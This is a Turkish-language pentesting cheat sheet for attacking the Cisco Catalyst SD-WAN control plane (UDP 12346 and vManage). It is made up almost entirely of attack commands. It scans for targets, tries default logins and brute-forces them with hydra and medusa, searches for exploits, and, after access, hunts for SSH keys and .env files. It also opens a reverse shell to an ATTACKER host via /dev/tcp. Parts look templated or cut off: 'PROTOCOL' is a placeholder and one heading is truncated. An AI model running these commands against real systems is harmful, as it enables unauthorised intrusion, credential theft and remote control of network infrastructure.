12346/udp - Pentesting Cisco Catalyst SD-WAN Control Plane
Cisco SD-WAN control
SD-WAN kontrol düzlemi (DTLS/12346 civarı) vEdge/vSmart konuşmasıdır. Yanlış expose edilen vManage/API ile config ve RCE zinciri kurulur.
Metodoloji
Section titled “Metodoloji”-
UDP/12346 ve HTTPS vManage portlarını bul.
-
Sürüm/fingerprint al.
-
Default/API kimlik dene.
-
Bilinen SD-WAN CVE ve config dump uygula.
nmap -Pn -sU -sV -p12346 TARGETnmap -Pn -sV -p443,8443,80 TARGETcurl -vk https://TARGET/nuclei -u https://TARGET -tags cisco,sdwanAuth / API
Section titled “Auth / API”curl -vk -X POST https://TARGET/j_security_check -d 'j_username=admin&j_password=admin'admin/admin, cisco/ciscocurl -vk https://TARGET/dataservice/deviceExploit
Section titled “Exploit”searchsploit cisco sd-wanmsfconsole -q -x 'search cisco sdwan; exit'nuclei -u https://TARGET -t cves/ -severityDerin enum
Section titled “Derin enum”/udp - Cisco Catalyst SD-WAN Control Pla için ek keşif ve fingerprint.
nmap -Pn -sV -sC -p12346 TARGETnmap -Pn -p12346 --script safe,discovery TARGETtimeout 5 bash -c 'echo | openssl s_client -connect TARGET:12346' 2>/dev/null | headpython3 -c "import socket;s=socket.create_connection(('TARGET',12346));s.settimeout(3);print(s.recv(4096))"Banner / TLS / ALPN notları → /udp - Cisco Catalyst SD-WAN Control PlaKimlik & brute (ek)
Section titled “Kimlik & brute (ek)”hydra -L users.txt -P rockyou.txt -s 12346 PROTOCOL://TARGET -t 4medusa -h TARGET -U users.txt -P rockyou.txt -M PROTOCOL -n 12346nmap -p12346 --script '*-brute' TARGETadmin/admin, root/root, guest/(boş), test/testExploit arama
Section titled “Exploit arama”searchsploit Cisco SD-WANmsfconsole -q -x 'search Cisco SD-WAN; exit'nuclei -u https://TARGET:12346 -t cves/ -silent -severity || truenuclei -u http://TARGET:12346 -tags tech -silent || trueManuel protokol
Section titled “Manuel protokol”nc -nv TARGET 12346printf '' | timeout 3 nc -nv TARGET 12346curl -vk --http1.0 http://TARGET:12346/Wireshark/tcpdump ile konuşmayı kaydet; replay denePost-erişim & loot
Section titled “Post-erişim & loot”config, key, session, env, backupfind / -name '*.conf' -o -name '*.env' -o -name 'id_rsa' 2>/dev/null | headss -lntp; ip a; cat /etc/passwd | headbash -i >& /dev/tcp/ATTACKER/443 0>&1mkdir -p loot && tee loot/notes.txtOperasyon checklist
Section titled “Operasyon checklist”[ ] Fingerprint / sürüm[ ] Auth ve anonim erişim[ ] PoC etki gösterildi[ ] Credential/shell paketlendi[ ] Pivot notuZincir
Section titled “Zincir”expose vManage → default/API auth → CVE/RCE → fabric pivot